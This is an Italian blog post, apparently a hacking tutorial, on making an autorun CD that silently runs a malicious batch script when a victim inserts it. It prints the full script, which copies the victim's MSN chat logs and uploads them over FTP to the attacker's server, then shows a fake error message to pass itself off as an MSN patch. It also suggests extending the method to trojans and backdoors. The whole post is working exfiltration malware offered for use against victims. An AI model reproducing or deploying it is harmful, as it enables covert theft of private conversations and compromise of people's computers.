il sistema consiste nel masterizzare in un cd-rom un file autorun e un altro contenente il programma maligno che verrà eseguito automaticamente dal sistema una volta inserito il cd nel lettore. ma ora vediamo come fare:
Semplicissimo: dopo aver inserito il cdrom contenente il programma maligno, quest’ultimo viene automaticamente eseguito senza richiedere nessuna autorizzazione all’utente.
A questo punto si aprono infinite porte per l’attaccante: possiamo eliminare file, installare trojan, rat, backdoor oppure copiare dei file direttamente su un server ftp.
…:::Come fare ciò?:::…
Inanzitutto bisogna procurarsi due file, i quali sono il cuore di tale sistema: autorun.inf e start.exe
Il primo file serve per “comunicare” al computer quale file deve avviare appena inserito il cdrom, invece il file “start.exe” (scaricabile da qui) serve per avviare il software maligno.
Nel file autorun.inf dobbiamo andare a scrivere di avviare prima “start.exe” e poi il programma maligno, per esempio:
[autorun]
open=start.exe file_maligno.exe
Facciamo finta che vogliamo che il nostro script maligno copi tutte le conversazioni del programma MSN: come prima cosa realizziamo una cartella per organizzare le nostre idee, dentro la quale andiamo a creare un file batch con il seguente codice:
—————————————————————————
@echo off
md c:\temp
cls
copy upload.txt C:\temp
cls
cd C:\Documents and Settings\%username%\Documenti\Le mie Conversazioni\settembre 2007
cls
copy *.html c:\temp
cls
cd c:\temp
cls
ftp -v -i -s:upload.txt
rd c:\temp
cls
echo “Messaggio d’errore 152245165″;
echo “La versione di MSN in uso non è compatibile con questo script”;
pause
—————————————————————————
Come è possibile capire osservando questo semplice codice, copia in una cartella temporanea tutte le conversazioni, per poi uplodarle su un server (in cui i dati di connessione si trovano in un file testuale) e alla fine per non destare sospetti restituisce un messaggio d’errore per far sembrare che il software fosse stata una patch per il software MSN. Diamo a questo file il nome di script.bat
Adesso andiamo a creare un file testuale nel quale andremmo a inserire i paramentri per far si che lo script in batch possa uplodare le conversazioni nel nostro spazio ftp, tale file lo andremmo a chiamare upload.txt
—————————————————————————
open ftp.[yoursite].it
[your username]
[your password]
cd logs
! cls
lcd c:\temp
! cls
ascii
! cls
! echo Attendere che venga completato il backup…
mput *.html
!cls
bye
quit
—————————————————————————
In questo file testuale è necessario modificare i valori tra parentesi con i propri dati di connessione.
Adesso è il momento di impostare il file autorun.inf, quindi metteremo:
[autorun]
open=start.exe script.bat
…:::Masterizziamo!!!:::…
A questo punto possiamo masterizzare il nostro Cd… mettiamo i file autorun.inf, start.exe, script.bat e upload.txt sul cd e avviamo la procedura di masterizzazione.
A scrittura completata appena il nostro cdrom verrà inserito nel computer della nostra vittima verranno uplodate tutte le conversazioni nel nostro spazio web… niente di più semplice.
Ovviamente potremmo far si che questo semplice programmi si trasformi in qualcosa di più pericolo, come un trojan, un backdoor o comunque codici maligni.
Con questo è tutto anche per oggi… Un salutone!!
Nessun commento:
Posta un commento
Vuoi commentare questo post? clicca qui :D